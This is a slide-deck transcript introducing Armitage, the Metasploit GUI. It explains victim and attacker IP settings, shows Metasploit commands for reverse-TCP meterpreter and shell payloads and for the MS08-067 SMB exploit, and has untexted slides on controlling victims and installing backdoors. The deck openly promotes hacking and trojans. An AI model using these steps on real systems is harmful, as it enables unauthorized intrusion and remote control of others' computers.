armitage : art of exploitation

Post on 31-Oct-2014

334 Views

Category:

Internet

3 Downloads

Preview:

Click to see full reader

DESCRIPTION

Armitage is a tool from Metasploit that penetration tester use for system or network penetration testing. Armitage is a GUI tool that supports a lot modules, exploits, payloads, auxiliaries for perform testing.

TRANSCRIPT

ARMITAGE

Art Of Exploitation

www.kapilsoni.in

By – Kapil Soni (2009)

www.kapilsoni.in

Armitage :-

Armitage is GUI (Graphical User Interface) Tools For Metasploit That can be used for

Penetration Testing of System and Network. It is a Main Or Easily Accessible Tool Of Metasploit

Framework. Also we can use it For Backdoor, Remote Access,

Trojan Creation, Hack System or Network, Destroy Systems or Networks or Much More.

In Armitage We Need Four Important Modules- RHOST (Victim’s IP Address) LHOST (Attacker’s IP Address) Payload Exploit

www.kapilsoni.in

Important Modules Of Armitage :-

RHOST :- RHOST Stands for REMOTE HOST Means Victim. If We Want Hack or Remote Access of Victim’s Computer so We Necessary Need IP Address Of Victim’s Computer. Without IP Address Of Victim’s Computer We Can not hack or Take Remote Access of Computer.

Setting RHOST By Command –>> SET RHOST 192.168.1.1 (Victim’s IP

Address)

LHOST :- LHOST Stands for LOCAL HOST Means Attacker. Many Exploits Demands of LHOST for Attacking Purpose or Remotely Access Purpose.

Setting LHOST By Command –>> SET LHOST 192.168.1.2 (Attacker’s IP

Address)

www.kapilsoni.in

Important Modules Of Armitage :-

PAYLOAD :- Payload is a way to communicate Victim’s computer. Payload Provides a Platform or a Medium to Communicate with Victim’s Computer.

There are many types of Payload According to Work or Uses. The Most Usable or Workable Payload is METERPRETER. Payload Gives You Options To Access Victim’s Computer.

Setting Payloads With the Help Of Command – >> set payload

windows/meterpreter/reverse_tcp>> set payload windows/vncinject/reverse_tcp>> set payload windows/shell/reverse_tcp

There are Above 250 Payloads are Available In Armitage.

www.kapilsoni.in

Important Modules Of Armitage :-

EXPLOITS :- Before Attack, You Must Choose Your Weapon. Armitage Make This Process Easy. For Example We Want to Hack Windows XP/2003, In Windows XP/2003 There are Many Types Of Vulnerability (Loophole), The Most Famous Or Attackable Vulnerability is MS_08_067.

Now If We Want To Remote Access Of Victim’s Computer So We Can Enter On Victim’s PC With The Help Of Exploit. There Are Many Types Of Exploits Available According To Vulnerability Or Working. Setting Exploit With The Help Of Command –

>> use windows/smb/ms08_067_netapi

www.kapilsoni.in

Graphical User Interface (GUI) Of Armitage :-

www.kapilsoni.in

Scanning Remote Host(Victim) In Armitage :-

www.kapilsoni.in

Finding Attacks For Victim PC In Armitage :-

www.kapilsoni.in

Triggering Vulnerability In Armitage :-

www.kapilsoni.in

After Attacking In Vulnerability :-

www.kapilsoni.in

Controlling Victim PC Through METERPRETER :-

www.kapilsoni.in

Browsing Files Victim PC Through METERPRETER :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Backdoor Through Armitage :-

www.kapilsoni.in

Thank Y

THANK YOU

top related